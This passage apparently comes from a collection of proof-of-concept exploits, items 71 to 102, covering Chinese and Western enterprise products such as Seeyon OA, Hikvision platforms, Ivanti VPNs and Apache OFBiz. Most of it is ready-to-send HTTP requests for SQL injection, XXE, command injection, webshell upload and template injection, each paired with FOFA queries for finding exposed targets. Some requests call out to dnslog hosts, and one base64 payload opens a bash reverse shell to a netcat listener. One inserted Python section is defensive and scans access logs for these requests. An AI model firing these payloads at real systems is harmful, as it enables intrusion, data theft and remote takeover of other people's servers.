User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
The xmlValue parameter decodes to an XML document whose DTD declares <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> and references &xxe; in the VALUE field of the Signature element.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then read the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) 掌上校园 campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
The UnitCode value is evaluated as a FreeMarker template; freemarker.template.utility.Execute runs the given command.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then verify the upload:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then verify the upload:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
The command to run is supplied in the Cmd header; the JSON body carries the payload, omitted here.

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered as a FreeMarker template before it is used, so the same Execute trick as in item 76 applies.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

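Several POCs in this section hide their target behind URL tricks: the ";.js" path parameter in items 68 and 69, the "..;/" segment in item 91, and the percent-encoded extension letter in item 89 ("editflow_manager.js%70"). A defender who greps access logs for the literal paths misses all three. The Python below is an added example, not code from the original post or from any of the vendors named: it normalizes each request path (percent-decoding, stripping ";" path parameters from every segment, resolving ".." and ".") before matching it against signatures taken from items 57 to 91. The log lines are constructed for the example and the indicator table is illustrative, not a complete ruleset.

```python
"""Added example: match access-log lines against this section's request
signatures after normalizing path-parameter and encoding tricks.

Not part of the original post. Log lines are constructed; the indicator
table covers a subset of items 57-91 and is not exhaustive.
"""
import re
from urllib.parse import unquote, urlsplit

# Combined-log-format line: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_path(raw_path: str) -> str:
    """Percent-decode, drop ';param' path parameters from every segment
    (wf_printnum.jsp;.js, task/..;/), and resolve '.' and '..', so that
    '/a/task/..;/x' and '/x.js%70' compare equal to '/a/x' and '/x.jsp'."""
    segments = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]          # servlet-container path parameter
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


# (name, regex over the normalized path, optional regex over the decoded query)
INDICATORS = [
    ("Chanjet T+ UFAQD SQLi (items 57/58)",
     re.compile(r"^/tplus/UFAQD/(keyEdit|KeyInfoList)\.aspx$"),
     re.compile(r"\bselect\b|waitfor", re.I)),
    ("IP-guard flexpaper view.php RCE (item 62)",
     re.compile(r"/flexpaper/php/view\.php$"), re.compile(r"page=\|\|")),
    ("ezOFFICE wf_printnum.jsp SQLi (item 68)",
     re.compile(r"/wf_printnum\.jsp$"), re.compile(r"waitfor\s+delay", re.I)),
    ("ezOFFICE contract_gd.jsp SQLi (item 69)",
     re.compile(r"/contract_gd\.jsp$"), re.compile(r"waitfor\s+delay", re.I)),
    ("Telesquare admin.cgi RCE (item 75)",
     re.compile(r"^/cgi-bin/admin\.cgi$"), re.compile(r"Command=setSyncTimeHost")),
    ("BYTEVALUE webRead RCE (item 79)",
     re.compile(r"^/goform/webRead/open$"), re.compile(r"path=\|")),
    ("JimuReport queryFieldBySql SSTI (item 84)",
     re.compile(r"/jmreport/queryFieldBySql$"), None),
    ("Seeyon FE editflow_manager SQLi (item 89)",
     re.compile(r"/sysform/003/editflow_manager\.jsp$"), None),
    ("Hikvision orgs/download file read (item 91)",
     re.compile(r"/orgManage/v1/orgs/download$"), None),
]


def scan_log(lines) -> list[dict]:
    """Return one finding per (line, indicator) pair that matches. Lines that
    do not parse as combined log format are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        path = normalize_path(parts.path)
        query = unquote(parts.query)
        for name, path_re, query_re in INDICATORS:
            if path_re.search(path) and (query_re is None or query_re.search(query)):
                findings.append({"ip": m["ip"], "ts": m["ts"],
                                 "indicator": name, "path": path})
    return findings


# Constructed sample log (not real traffic): five requests from this section
# in their evasive spellings, followed by two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 200 5120
10.0.0.5 - - [12/May/2024:10:01:09 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 311
10.0.0.7 - - [12/May/2024:10:02:15 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 1806
10.0.0.7 - - [12/May/2024:10:02:40 +0800] "POST /sysform/003/editflow_manager.js%70 HTTP/1.1" 200 77
10.0.0.9 - - [12/May/2024:10:03:01 +0800] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 64
192.168.1.20 - - [12/May/2024:10:03:30 +0800] "GET /defaultroot/platform/portal/layout/index.jsp HTTP/1.1" 200 9001
192.168.1.20 - - [12/May/2024:10:03:31 +0800] "GET /static/app.js HTTP/1.1" 304 0
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} {f['indicator']} {f['path']}")
```

Normalizing before matching is the point of the example: the ";.js" and "..;/" requests resolve to the same paths the vendor endpoints actually live at, so one signature per endpoint covers every spelling. Queries are decoded but not normalized further; POST bodies (items 76 and 84) are not in access logs and need the application's own request logging or a WAF to inspect.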
85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below writes a Godzilla webshell (payload omitted):
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The uploaded file is then reachable at /jfhatuwe.php

88. DBAPPSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
The type parameter is injected into a shell command; the value below decodes to an echo that appends a PHP file to /usr/local/webui/txzfsrur.php.
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The written file is then reachable at /txzfsrur.php (the name used in the echo redirect above)

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
The path ends in .js%70, which decodes to .jsp; the encoding is there to get past extension-based access checks.
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
The "..;/" segment is a path-parameter trick: the access filter sees a path under /center/api/task/, while the container resolves the request to /center/api/orgManage/v1/orgs/download.
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center /center/api/session command execution
Fastjson deserialization; the command to run is supplied in the Testcmd header and the JSON payload is omitted here.
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin Legendsec (奇安信网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then verify the upload:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.xx.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

